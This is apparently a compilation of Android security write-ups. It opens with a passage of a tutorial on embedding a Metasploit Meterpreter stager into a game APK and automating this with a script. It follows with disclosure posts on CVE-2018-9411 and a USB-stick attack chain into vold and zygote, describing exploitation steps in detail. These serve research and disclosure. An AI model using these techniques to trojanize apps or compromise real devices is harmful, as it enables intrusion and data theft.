For resigning, one easy method is to use the Android debugging keystore which is built if you install Android studio. The debugging keystore will be contained within the “.android” hidden directory in your home directory on a UN*X system.


An alternative method is to use the Java “keytool” to generate your own self-signed keystore and sign it using the “jarsigner” tool as shown in the screenshots below.


At this point in time, the “final.apk” file is ready to be loaded onto an Android system using “adb”.

In this specific case, I am running a copy of “GenyMotion” which is an x86 based emulator that uses VirtualBox for a very high performing Android emulation. One of the challenges you might immediately run into is that the x86 emulation will not natively support the ARM processor. To get around this challenge, there are some ARM translation libraries available online. You would need to search for “” and then drag the ZIP file onto a running GenyMotion Android system. Unfortunately, this is not 100% reliable, and some app crashes may still result.

One certain way to make sure an ARM APK file runs on a device is to use a hardware device itself. I have found that the Nexus 6 series of devices are nice to work with as the “rooting” kit is fairly reliable, and attaching via a USB cable for testing is not too onerous.


The final step is of course to try out our newly infected Cowboy Shooting game. We find out quickly, that the moment we launch the game, we get a Meterpreter shell on our KALI system which just feels so right.


I really don’t think I am going to take the time to learn this game, which frankly was just a random pick from “”.

So Many Complicated Steps… so much can go wrong…

So after performing all of the requisite steps above, I was immediately frustrated. There are so many moving parts that the chances of error are pretty high. There are likely other tools out there which are available to use but I decided to whip up a quick Python script to automate this process. I called it “” and I will warn you now, this is definitely a quick and dirty effort to get something to do the job without much effort on hardening the logic at all.


The idea of “” is that if you supply a Metasploit generated APK file, an original APK to modify, and a keystore, it will perform all of the steps in an automated fashion and generate the result for you.

Below is an example of running the tool. All of the temporary files, and output will be stored in the “~/.ae” directory.


The tool also will remove the “metasploit” directory name and obfuscate it with a random string directory name automatically. You can see this result in the below screenshot in which I listed the contents of the APK “smali/com” directory. The directory named “dbarpubw” actually contains the Metasploit stager code.


There is much continuing fun to be had with mobile apps, and their associated application programming interfaces. It is a good idea to get familiar with the platforms as a pen tester as you will undoubtedly encounter a need to test in the mobile space before long.

I suppose you just might want to play with “Android EmbedIT” now! Well if you do, you can download from my github by visiting

Keep calm, and hack all the mobile things. ~Joff


CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services

( Original text by Tamir Zahavi-Brunner )

Картинки по запросу android

As part of our platform research in Zimperium zLabs, I have recently discloseda a critical vulnerability affecting multiple high-privileged Android services to Google. Google designated it as CVE-2018-9411 and patched it in the July security update (2018-07-01 patch level), including additional patches in the September security update (2018-09-01 patch level).

I also wrote a proof-of-concept exploit for this vulnerability, demonstrating how it can be used in order to elevate permissions from the context of a regular unprivileged app.

In this blog post, I will cover the technical details of the vulnerability and the exploit. I will start by explaining some background information related to the vulnerability, followed by the details of the vulnerability itself. I will then describe why I chose a particular service as the target for the exploit over other services that are affected by the vulnerability. I will also analyze the service itself in relation to the vulnerability. Lastly, I will cover the details of the exploit I wrote.

Project Treble

Project Treble introduces plenty of changes to how Android operates internally. One massive change is the split of many system services. Previously, services contained both AOSP (Android Open Source Project) and vendor code. After Project Treble, these services were all split into one AOSP service and one or more vendor services, called HAL services. For more background information, the separation between services is described more thoroughly in my BSidesLV talk and in my previous blog post.


The separation of Project Treble introduces an increment in the overall number of IPC (inter-process communication); data which was previously passed in the same process between AOSP and vendor code must now pass through IPC between AOSP and HAL services. As most IPC in Android goes through Binder, Google decided that the new IPC should do so as well.

But simply using the existing Binder code was not enough, Google also decided to perform some modifications. First, they introduced multiple Binder domains in order to separate between this new type of IPC and others. More importantly, they introduced HIDL – a whole new format for the data passed through Binder IPC. This new format is supported by a new set of libraries, and is dedicated to the new Binder domain for IPC between AOSP and HAL services. Other Binder domains still use the old format.

The operation of the new HIDL format compared to the old one is a bit like layers. The underlying layer in both cases is the Binder kernel driver, but the top layer is different. For communication between HAL and AOSP services, the new set of libraries is used; for other types of communication, the old set of libraries is used. Both sets of libraries contain very similar code, to the point that some of the original code was even copied to the new HIDL libraries (although personally I could not find a good reason for copy-pasting code here, which is generally not a good practice). The usage of each of these libraries is not exactly the same (you cannot simply substitute one with another), but it is still very similar.

Both sets of libraries represent data that transfers in Binder transactions as C++ objects. This means that HIDL introduces its own new implementation for many types of objects, from relatively simple ones like objects that represent strings to more complex implementations like file descriptors or references to other services.

Sharing memory

One important aspect of Binder IPC is the use of shared memory. In order to maintain simplicity and good performance, Binder limits each transaction to a maximum size of 1MB. For situations where processes wish to share larger amounts of data between each other through Binder, shared memory is used.

In order to share memory through Binder, processes utilize Binder’s feature of sharing file descriptors. The fact that file descriptors can be mapped to memory using mmap allows multiple processes to share the same memory region by sharing a file descriptor. One issue here with regular Linux (non-Android) is that file descriptors are normally backed by files; what if processes want to share anonymous memory regions? For that reason, Android has ashmem, which allows processes to allocate memory to back file descriptors without an actual file involved.

Sharing memory through Binder is an example of different implementations between HIDL and the old set of libraries. In both cases the eventual actions are the same: one process maps an ashmem file descriptor in its memory space, transfers that file descriptor to another process through Binder and then that other process maps it in its own memory space. But the implementations for the objects which handle this are different.

In HIDL’s case, an important object for sharing memory is hidl_memory. As described in the source code: “hidl_memory is a structure that can be used to transfer pieces of shared memory between processes”.

The vulnerability

Let’s take a closer look at hidl_memory by looking at its members:

Snippet from system/libhidl/base/include/hidl/HidlSupport.h (source)
  • mHandle – a handle, which is a HIDL object that holds file descriptors (only one file descriptor in this case).
  • mSize – the size of the memory to be shared.
  • mName – supposed to represent the type of memory, but only the ashmem type is really relevant here.

When transferring structures like this through Binder in HIDL, complex objects (like hidl_handle or hidl_string) have their own custom code for writing and reading the data, while simple types (like integers) are transferred “as is”. This means that the size is transferred as a 64 bit integer. On the other hand, in the old set of libraries, a 32 bit integer is used.

This seems rather strange, why should the size of the memory be 64 bit? First of all, why not do the same as in the old set of libraries? But more importantly, how would a 32 bit process handle this? Let’s check this by taking a look at the code which maps a hidl_memory object (for the ashmem type):

Snippet from system/libhidl/transport/memory/1.0/default/AshmemMapper.cpp (source)

Interesting! Nothing about 32 bit processes, and not even a mention that the size is 64 bit.

So what happens here? The type of the length field in mmap’s signature is size_t, which means that its bitness matches the bitness of the process. In 64 bit processes there are no issues, everything is simply 64 bit. In 32 bit processes on the other hand, the size is truncated to 32 bit, so only the lower 32 bits are used.

This means that if a 32 bit process receives a hidl_memory whose size is bigger than UINT32_MAX (0xFFFFFFFF), the actual mapped memory region will be much smaller. For instance, for a hidl_memory with a size of 0x100001000, the size of the memory region will only be 0x1000. In this scenario, if the 32 bit process performs bounds checks based on the hidl_memory size, they will hopelessly fail, as they will falsely indicate that the memory region spans over more than the entire memory space. This is the vulnerability!

Finding a target

We have a vulnerability; let’s now try to find a target. We are looking for a HAL service which meets the following criteria:

  1. Compiles to 32 bit.
  2. Receives shared memory as input.
  3. When performing bounds check on the shared memory, does not truncate the size as well. For example, the following code is not vulnerable, as it performs bounds check on a truncated size_t:

These are the essential requirements for this vulnerability, but there are some more optional ones which I think make for a more interesting target:

  1. Has a default implementation in AOSP. While ultimately vendors are in charge of all HAL services, AOSP does contain default implementations for some, which vendors can use. I found that in many cases when such implementation exists, vendors are reluctant to modify it and end up simply using it as is. This makes such a target more interesting, as it can be relevant in multiple vendor, as opposed to a vendor-specific service.

One thing you should note is that even though HAL services are supposed to only be accessible by other system services, this is not really the truth. There are a select few HAL services which are in fact accessible by regular unprivileged apps, each for its own reason. Therefore, the last requirement for the target is:

  1. Directly accessible from an unprivileged app. Otherwise this makes everything a bit hypothetical, as we will be talking about a target which is only accessible in case you already compromise another service.

Luckily, there is one HAL service which meets all these requirements: android.hardware.cas, AKA MediaCasService.


CAS stands for Conditional Access System. CAS in itself is mostly out of the scope of this blog post, but in general, it is similar to DRM (so much so that the differences are not always clear). Simplistically, it functions in the same way as DRM – there is encrypted data which needs to be decrypted.


First and foremost, MediaCasService indeed allows apps to decrypt encrypted data. If you read my previous blog post, which dealt with a vulnerability in a service called MediaDrmServer, you might notice that there is a reason for the comparison with DRM. MediaCasService is extremely similar to MediaDrmServer (the service in charge of decrypting DRM media), from its API to the way it operates internally.

A slight change from MediaDrmServer is the terminology: instead of decrypt, the API is called descramble (although they do end up calling it decrypt internally as well).

Let’s take a look at how the descramble method operates (note that I am omitting some minor parts here in order to simplify things):

Unsurprisingly, data is shared over shared memory. There is a buffer indicating where the relevant part of the shared memory is (called srcBuffer, but is relevant for both source and destination). On this buffer, there are offsets to where the service reads the source data from and where it writes the destination data to. It is possible to indicate that the source data is in fact clear and not encrypted, in which case the service will simply copy data from source to destination without modifying it.

This looks great for the vulnerability! At least if the service only uses the hidl_memory size in order to verify that it all fits inside the shared memory, and not other parameters. In that case, by letting the service believe that our small memory region spans over its entire memory space, we could circumvent the bounds checks and put the source and destination offsets anywhere we like. This should give us full read+write access to the service memory, as we could read from anywhere to our shared memory and write from our shared memory to anywhere. Note that negative offsets should also work here, as even 0xFFFFFFFF (-1) would be less than the hidl_memory size.

Let’s verify that this is indeed the case by looking at descramble’s code. Quick note: the function validateRangeForSize simply checks that “first_param + second_param <= third_param” while minding possible overflows.

Snippet from hardware/interfaces/cas/1.0/default/DescramblerImpl.cpp (source)

As you can see, the code checks that srcBuffer lies inside the shared memory based on the hidl_memory size. After this the hidl_memory is not used anymore and the rest of the checks are performed against srcBuffer itself. Perfect! All we need then in order to achieve full read+write access is to use the vulnerability and then set srcBuffer’s size to more than 0xFFFFFFFF. This way, any value for the source and destination offsets would be valid.

Using the vulnerability for out-of-bounds read


Using the vulnerability for out-of-bounds write

The TEE device

Before writing an exploit using this (very good) primitive, let’s think about what we really want this exploit to achieve. A look at the SELinux rules for this service shows that it is in fact heavily restricted and does not have a lot of permissions. Still, it has one interesting permission that a regular unprivileged app does not have: access to the TEE (Trusted Execution Environment) device.

This permission is extremely interesting as it lets an attacker access a wide variety of things: different device drivers for different vendors, different TrustZone operating systems and a large amount of trustlets. In my previous blog post, I have already discussed how dangerous this permission can be.

While there are indeed many things you can do with access to the TEE device, at this point I merely wanted to prove that I could get this access. Hence, my objective was to perform a simple operation which requires access to the TEE device. In the Qualcomm TEE device driver, there is a fairly simple ioctl which queries for the version of the QSEOS running on the device. Therefore, my target when building the exploit for MediaCasService was to run this ioctl and get its result.

The exploit

Note: My exploit is for a specific device and build – Pixel 2 with the May 2018 security update (build fingerprint: “google/walleye/walleye:8.1.0/OPM2.171019.029.B1/4720900:user/release-keys”). A link to the full exploit code is available at the end of the blog post.

So far we have full read+write over the target process memory. While this is a great primitive, there are two issues that need to be solved:

  • ASLR – while we do have full read access, it is only relative to where our shared memory was mapped; we do not know where it is compared to other data in memory. Ideally, we would like to find the address of the shared memory as well as addresses of other interesting data.
  • For each execution of the vulnerability, the shared memory gets mapped and then unmapped after the operation. There is no guarantee that the shared memory will get mapped in the same location each time; it is entirely possible that another memory region will take its place between executions.

Let’s take a look at some of the memory maps of the linker in the service memory space for this specific build:

As you can see, the linker happens to create a small gap of 2 memory pages (0x2000) between linker_alloc_small_objects and linker_alloc. The addresses for these memory maps are relatively high; all libraries loaded by this process are mapped to lower addresses. This means that this gap is the highest gap in memory. Since mmap’s behavior is to try to map to high addresses before low addresses, any attempt to map a memory region of 2 pages or less should be mapped in this gap. Luckily, the service does not normally map anything so small, which means that this gap should stay there. This solves our second issue, as this is a deterministic location in memory where our shared memory will always be mapped.

Let’s look at the data in the linker_alloc straight after the gap:

The linker data in here happens to be extremely helpful for us; it contains addresses which can easily indicate the address of the linker_alloc memory region. Since the vulnerability gives us relative read, and we already concluded that our shared memory will be mapped straight before this linker_alloc, we can use it in order to determine the address of the shared memory. If we take the address at offset 0x40 and reduce it by 0x10, we get the linker_alloc address. Reducing it by the size of the shared memory itself will result in the shared memory address.

So far we solved the second issue, but have only partially solved the first issue. We do have the address of our shared memory, but not of other interesting data. But what other data are we interested in?

Hijacking a thread

One part of the MediaCasService API is the ability for clients to provide listeners to events. If a client provides a listener, it will be notified when different CAS events occur. A client can also trigger events by its own, which will then be sent back to the listener. The way this works through Binder and HIDL is that when the service sends an event to the listener, it will wait until the listener finished processing the event; a thread will be blocked waiting for the listener.

Flow of triggering an event

This is great for us; we can cause a thread in the service to be blocked waiting for us, in a known pre-determined thread. Once we have a thread in this state, we can modify its stack in order to hijack it; then only after we finish, we can resume the thread by finishing to process the event. But how do we find the thread stack in memory?

As our deterministic shared memory address is so high, the distance between that address and possible locations of the blocked thread stack is big. The effect of ASLR makes it too unreliable to try to find the thread stack relatively from our deterministic address, so we use another approach. We try to use a bigger shared memory and have it mapped before the blocked thread stack, so we will be able to reach it relatively through the vulnerability.

Instead of only getting one thread to that blocked state, we get multiple (5) threads. This causes more threads to be created, with more thread stacks allocated. By doing this, if there are a few thread-stack-sized gaps in memory, they should be filled, and at least one thread stack in a blocked thread should be mapped at a low address, without any library mapped before it (remember, mmap’s behavior is to map regions at high addresses before low addresses). Then, ideally, if we use a large shared memory, it should be mapped before that.

MediaCasService memory map after filling gaps and mapping our shared memory

One drawback is that there is a chance that other unexpected things (like jemalloc heap) will get mapped in the middle, so the blocked thread stack won’t be where we expect it to be. There could be multiple approaches to solve this. I decided to simply crash the service (using the vulnerability in order to write to an unmapped address) and try again, as every time the service crashes it simply restarts. In any case, this scenario normally does not happen, and even when it does, one retry is usually enough.

Once our shared memory is mapped before the blocked thread stack, we use the vulnerability to read two things from the thread stack:

  • The thread stack address, using pthread metadata which lies in the same memory region after the stack itself.
  • The address where libc is mapped at in order to later build a ROP chain using both gadgets and symbols in libc (libc has enough gadgets). We do this by reading a return address to a specific point in libc, which is in the thread stack.

Data read from thread stack

From now on, we can read and write to the thread stack using the vulnerability. We have both the address of the deterministic shared memory location and the address of the thread stack, so by using the difference between the addresses we can reach the thread stack from our shared memory (the small one with deterministic location).

ROP chain

We have full access to a blocked thread stack which we can resume, so the next step is to execute a ROP chain. We know exactly which part of the stack to overwrite with our ROP chain, as we know the exact state that the thread is blocked at. After overwriting part of the stack, we can resume the thread so the ROP chain is executed.

Unfortunately, the SELinux limitations on this process prevent us from turning this ROP chain into full arbitrary code execution. There is no execmem permission, so anonymous memory cannot be mapped as executable, and we have no control over file types which can be mapped as executable. In this case, the objective is pretty simple (running a single ioctl), so I simply wrote a ROP chain which does this. In theory, if you want to perform more complex stuff, the primitive is so strong that it should still be possible. For instance, if you want to perform complex logic based on a result of a function, you could perform multi-stage ROP: perform one ROP chain which runs that function and writes its result somewhere, read that result, perform the complex logic in your own process and then run another ROP chain based on that.

As was previously mentioned, the objective is to obtain the QSEOS version. Here is the code that is essentially performed by the ROP chain in order to do that:

stack_addr is the address of the memory region of the stack, which is simply an address that we know is writable and will not be overwritten (the stack begins from the bottom and is not close to the top), so we can write the result to that address and then read it using the vulnerability. The sleep at the end is so the thread will not crash immediately after running the ROP chain, so we can read the result.

Building the ROP chain itself is pretty straightforward. There are enough gadgets in libc to perform it and all the symbols are in libc as well, and we already have libc’s address.

After we are done, the process is left in a bit of an unstable state, as we hijacked a thread to execute our ROP chain. In order to leave everything in a clean state, we simply crash the service using the vulnerability (by writing to an unmapped address) in order to let it restart.


As I previously discussed in my BSidesLV talk and in my previous blog post, Google claims that Project Treble benefits Android security. While that is true in many cases, this vulnerability is another example of how elements of Project Treble could lead to the opposite. This vulnerability is in a library introduced specifically as part of Project Treble, and does not exist in a previous library which does pretty much the same thing. This time, the vulnerability is in a commonly used library, so it affects many high-privileged services.

Full exploit code is available on GitHub. Note: the exploit is only provided for educational or defensive purposes; it is not intended for any malicious or offensive use.



I would like to thank Google for their quick and professional response, Adam Donenfeld (@doadam), Ori Karliner (@oriHCX), Rani Idan (@raniXCH), Ziggy (@z4ziggy) and the rest of the Zimperium zLabs team.

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

( origin  by Jann Horn, Google Project Zero )

Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).


After an Android phone has been unlocked once on boot (on newer devices, using the «Unlock for all features and data» screen; on older devices, using the «To start Android, enter your password» screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.
(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)


The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at: («directory traversal over USB via injection in blkid output») («privesc zygote->init; chain from USB»)


These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn’t necessarily complete):


  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.


This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel’s filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold(one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.


The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which can not store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.


To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:


/dev/block/sda1: LABEL=»<label>» UUID=»<uuid>» TYPE=»<type>»


However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid’s output only scanned for the first occurrences of UUID=» and TYPE=». Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel’s vfat filesystem implementation should be able to mount,PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:


   if (mFsType != «vfat») {
       LOG(ERROR) << getId() << » unsupported filesystem » << mFsType;
       return -EIO;
   if (vfat::Check(mDevPath)) {
       LOG(ERROR) << getId() << » failed filesystem check»;
       return -EIO;
   // Use UUID as stable name, if available
   std::string stableName = getId();
   if (!mFsUuid.empty()) {
       stableName = mFsUuid;
   mRawPath = StringPrintf(«/mnt/media_rw/%s», stableName.c_str());
   if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
       PLOG(ERROR) << getId() << » failed to create mount points»;
       return -errno;
   if (vfat::Mount(mDevPath, mRawPath, false, false, false,
           AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
       PLOG(ERROR) << getId() << » failed to mount » << mDevPath;
       return -EIO;


The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.


This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is ‘UUID=»../##’ into a locked phone, the phone will mount that USB stick to /mnt/##.


However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, others worked around:


  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes ‘UUID=»‘ to start the injection, which leaves only five characters for the directory traversal — insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mountonpermission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won’t be permitted to actually interact with the filesystem — for example, the zygote and system_server aren’t allowed to do so. On top of that, processes that don’t have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section «Dealing with SELinux: Triggering the bug twice» describes how these restrictions can be avoided in the context of this specific bug.

Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you’d then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn’t require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time,blkid also performs some sanity checks on superblocks, the PoC takes a different route.


After blkid has read parts of the filesystem and used them to determine the filesystem’s type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.


A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.


This is relatively simple to implement in practice thanks to Linux’ built-in support for device-side USB.Andrzej Pietrasiewicz’s talk «Make your own USB gadget» is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.


The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn’t add unwanted caching.


At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string ‘UUID=»../../data’), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over, which has the necessary privileges to exfiltrate external storage contents.


However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.


vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at/data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.


As an attacker, it normally shouldn’t be possible to mount an ext4 filesystem this way because phones aren’t usually set up with any such keys; and even if there is such a key, you’d still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn’t entirely correct — actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)


Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.


In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem — including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.


When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable/system partition; only the art file is actually stored on /data. But we can instead and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with__attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.


The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.


When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the «Unlock for all features and data» prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running «ls /sdcard» on the device.


This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.


Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn’t immediately fall over — while parts of the UI become unusable, most places have some error handling that prevents the system from failing so clearly that a restart happens.
After some experimentation, it turned out that Android’s code for tracking bandwidth usage has a safety check: If the network usage tracking code can’t write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.


To create a network connection, there are two options:


  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn’t work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.


For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you’d probably want to use an ethernet connection.


At this point, we can run arbitrary native code in zygote context and access user data; but we can’t yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would’ve been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we’ll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMINcapability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting theNO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:


  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 — which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn’t work if the root filesystem is a rootfs filesystem. This is the technique used here.


In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers/system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux labelu:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):


domain_auto_trans(domain, crash_dump_exec, crash_dump);


At the time this bug was reported, the crash_dump domain had the following SELinux policy:


allow crash_dump {
}:process { ptrace signal sigchld sigstop sigkill };
r_dir_file(crash_dump, domain)


This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take overvold.


